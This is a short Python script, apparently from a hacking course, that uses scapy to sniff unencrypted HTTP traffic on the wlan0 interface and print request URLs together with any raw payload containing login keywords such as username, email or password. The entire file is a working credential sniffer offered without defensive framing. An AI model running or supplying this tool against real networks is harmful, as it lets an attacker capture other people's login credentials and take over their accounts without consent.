#!/usr/bin/env python3
import scapy.all as scapy
from scapy.layers import http
def sniffer(interface):
    scapy.sniff(iface = interface, store =False, prn = process_sniffed_packet, filter  = "port 80")

def get_url_packet(packet):
    return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path

def get_login_info(packet,url):
    if packet.haslayer(scapy.Raw):
        load = str(packet[scapy.Raw].load)
        keywords =  ["username","Username","user","User","login","Login","email","e-mail","E-mail","Email","Password","password","pass","passwd","Pass","Passwd"]
        for word in keywords:
            if word in load:
                print("-----URL: " + str(url) +"\n")
                print("[+] Posible username and password:  "+ load)
                print("=========================================================================================\n")

def process_sniffed_packet(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url_packet(packet)
        get_login_info(packet,url)

sniffer("wlan0")